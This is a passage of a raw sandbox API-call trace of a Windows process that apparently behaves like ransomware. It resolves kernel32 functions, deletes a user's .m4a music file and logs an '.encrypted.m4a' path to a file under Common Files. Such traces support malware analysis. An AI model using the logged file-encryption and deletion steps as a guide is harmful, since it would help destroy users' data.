dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0038.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88c910 [0038.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88c910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0038.404] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.404] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0038.405] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0038.405] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0038.405] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0038.405] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0038.405] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.405] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.405] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a78 [0038.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0038.406] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.406] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.406] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.406] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0038.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0038.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.406] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a", lpFilePart=0x0) returned 0x39 [0038.406] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x858f4c0, ftCreationTime.dwHighDateTime=0x1d5c04d, ftLastAccessTime.dwLowDateTime=0xae3b6570, ftLastAccessTime.dwHighDateTime=0x1d5bfbd, ftLastWriteTime.dwLowDateTime=0x16997dc0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x28f2, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="s65Zb6gGvH2opWaFb.m4a", cAlternateFileName="S65ZB6~1.M4A")) returned 0x7c2240 [0038.406] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\s65zb6ggvh2opwafb.m4a")) returned 1 [0038.407] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x858f4c0, ftCreationTime.dwHighDateTime=0x1d5c04d, ftLastAccessTime.dwLowDateTime=0xae3b6570, ftLastAccessTime.dwHighDateTime=0x1d5bfbd, ftLastWriteTime.dwLowDateTime=0x16997dc0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x28f2, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="s65Zb6gGvH2opWaFb.m4a", cAlternateFileName="S65ZB6~1.M4A")) returned 0 [0038.407] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0038.408] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.408] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0038.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0038.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0038.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0038.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.408] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.408] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0038.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.408] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0038.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.408] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0038.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0038.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.409] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0038.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.409] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.409] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.409] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.409] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0038.409] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.409] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.409] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0038.409] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x255c, lpOverlapped=0x0) returned 1 [0038.410] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0038.410] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x255c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.410] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0038.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.encrypted.m4a\r\n", cchWideChar=70, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0038.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x46) returned 0x88e138 [0038.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.encrypted.m4a\r\n", cchWideChar=70, lpMultiByteStr=0x88e138, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.encrypted.m4a\r\n", lpUsedDefaultChar=0x0) returned 70 [0038.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0038.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0038.411] WriteFile (in: hFile=0x128, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x45, lpOverlapped=0x0) returned 1 [0038.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0038.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.411] CloseHandle (hObject=0x128) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0038.412] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0038.412] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0038.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.414] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0038.414] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.414] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0038.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0038.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.414] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0038.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3f8 [0038.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0038.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0038.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0038.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0038.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897f0 [0038.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0038.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0038.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0038.415] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0038.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.415] RtlAllocateHeap (HeapHandle=0x770000, 